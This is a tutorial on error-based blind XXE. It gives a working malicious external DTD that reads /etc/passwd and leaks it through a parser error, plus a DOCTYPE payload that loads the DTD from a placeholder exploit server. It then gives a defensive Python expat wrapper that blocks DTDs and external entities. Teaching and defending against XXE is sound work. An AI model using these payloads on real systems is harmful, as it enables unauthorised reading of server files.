Blind XXE to LFI

An alternative approach to exploiting a blind XXE is to trigger an XML parsing error whose message carries the sensitive data. This works when the parser's error message is reflected in the application's response.

We can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
  • Declares an XML parameter entity called file, whose content is /etc/passwd.

  • Declares an XML parameter entity called eval, which dynamically declares another parameter entity called error. The error entity, when used, loads a non-existent file whose name contains the value of the file entity.

  • References the eval entity, which causes the error entity to be declared.

  • References the error entity, so the parser attempts to load the non-existent file.

The result is an error message that names the non-existent file, and that name contains the contents of /etc/passwd.

Create the malicious external DTD, save it, and host it on your exploit server:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Now insert an XML statement that invokes the external DTD, as usual:

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://YOUR-EXPLOIT-DTD"> %xxe;]>

The response now contains an error message with the contents of /etc/passwd.
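The technique above only works because the server-side parser is willing to fetch an external DTD and expand parameter entities. The following is an added example (not code from the original page) of the defensive counterpart: a wrapper around Python's standard-library expat parser that refuses DOCTYPE declarations by default, never expands parameter entities, and refuses, while recording, any external general entity it is asked to resolve, so the attempt can be logged instead of silently swallowed. The sample documents are constructed for the example; EXPLOIT-HOST is a placeholder, not a real server, and nothing is fetched from the network or the filesystem.

```python
"""Hardened XML parsing for untrusted input (added example, stdlib only)."""
import xml.parsers.expat as expat


class UnsafeXmlRejected(Exception):
    """Raised when untrusted XML carries a DTD or an external entity."""


def parse_untrusted(xml_text, allow_dtd=False):
    """Parse untrusted XML without resolving anything external.

    Returns {"root": root tag, "text": character data,
             "blocked": [system ids the parser was asked to fetch]}.
    Raises UnsafeXmlRejected if a DOCTYPE appears (unless allow_dtd=True)
    or if the document references an external general entity.
    """
    result = {"root": None, "text": "", "blocked": []}
    parser = expat.ParserCreate()

    # Layer 1: default-deny. Untrusted input has no business carrying a DTD,
    # so refuse it outright; the exception propagates out of Parse().
    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_dtd:
            raise UnsafeXmlRejected(f"DOCTYPE {name!r} not allowed in untrusted input")
    parser.StartDoctypeDeclHandler = on_doctype

    # Layer 2: never expand parameter entities, so a "%xxe;" reference in the
    # internal subset cannot pull in an attacker-hosted external DTD.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    # Layer 3: refuse external general entities (e.g. "&xxe;" in content) and
    # record the requested URI so the event can be logged or alerted on.
    def on_external_ref(context, base, system_id, public_id):
        result["blocked"].append(system_id)
        return 0  # 0 tells expat the reference was not handled -> parse error
    parser.ExternalEntityRefHandler = on_external_ref

    def on_start(name, attrs):
        if result["root"] is None:
            result["root"] = name
    parser.StartElementHandler = on_start

    def on_chars(data):
        result["text"] += data
    parser.CharacterDataHandler = on_chars

    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError as exc:
        if result["blocked"]:
            raise UnsafeXmlRejected(
                f"external entity resolution blocked: {result['blocked']}") from exc
        raise  # genuinely malformed XML, not an attack
    return result


def reject_reason(xml_text, allow_dtd=False):
    """Return None if the document parsed, else the rejection message."""
    try:
        parse_untrusted(xml_text, allow_dtd=allow_dtd)
    except UnsafeXmlRejected as exc:
        return str(exc)
    return None


# Constructed samples. EXPLOIT-HOST is a placeholder; no request is ever made.
ERROR_BASED_XXE = (
    '<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://EXPLOIT-HOST/evil.dtd"> %xxe;]>'
    '<d0p>hello</d0p>'
)
GENERAL_ENTITY_XXE = (
    '<!DOCTYPE d [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    '<d>&xxe;</d>'
)
BENIGN = '<order id="7"><item>widget</item></order>'


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("error-based XXE", ERROR_BASED_XXE),
                       ("general-entity XXE", GENERAL_ENTITY_XXE)]:
        print(f"{label:20s} default  -> {reject_reason(doc)}")
        print(f"{label:20s} allow_dtd -> {reject_reason(doc, allow_dtd=True)}")
```

With the default policy both XXE samples are rejected at the DOCTYPE, which is the behaviour to aim for on any endpoint that accepts XML from users. The allow_dtd=True path shows the defence in depth for legacy documents that legitimately carry a DTD: the error-based payload from this page parses as a plain d0p element because the parameter entity is never expanded, so the external DTD is never fetched and no error message is produced for the attacker to read, while a direct external general entity reference is blocked and its target URI is captured for logging.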
